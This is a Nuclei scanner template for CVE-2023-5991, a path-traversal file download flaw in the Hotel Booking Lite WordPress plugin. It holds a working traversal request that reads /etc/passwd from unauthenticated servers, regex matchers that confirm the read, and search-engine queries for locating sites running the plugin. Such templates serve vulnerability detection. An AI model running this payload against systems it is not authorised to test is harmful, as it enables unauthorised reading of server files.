nuclei-templates/http/cves/2023/CVE-2023-5991.yaml

54 lines
1.8 KiB
YAML

id: CVE-2023-5991
info:
name: Hotel Booking Lite < 4.8.5 - Arbitrary File Download & Deletion
author: Kazgangap
severity: critical
description: |
The Hotel Booking Lite WordPress plugin before 4.8.5 does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server
remediation: Fixed in 4.8.5
reference:
- https://wpscan.com/vulnerability/e9d35e36-1e60-4483-b8b3-5cbf08fcd49e/
- https://nvd.nist.gov/vuln/detail/CVE-2023-5991
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-5991
cwe-id: CWE-22
epss-score: 0.17487
epss-percentile: 0.96115
cpe: cpe:2.3:a:motopress:hotel_booking_lite:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: motopress
product: hotel_booking_lite
framework: wordpress
shodan-query: http.html:/wp-content/plugins/motopress-hotel-booking
fofa-query: body=/wp-content/plugins/motopress-hotel-booking
publicwww-query: "/wp-content/plugins/motopress-hotel-booking"
tags: cve,cve2023,lfi,motopress-hotel-booking,wordpress,wp-plugin,wpscan,wp,motopress
http:
- method: GET
path:
- "{{BaseURL}}/?filename=../../../../../../etc/passwd&mphb_action=download"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "filename="
- "/etc/passwd"
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450221008aed4131d72f2a882a3d06d2d9baa4b4e8c1587b36400dfe6e4177d7ab0dfd74022025db93ee8eb043c22cac910ae7ddafe92f578a3c00db013fe89aa59d4e0e35ff:922c64590222798bb761d5b6d8e72950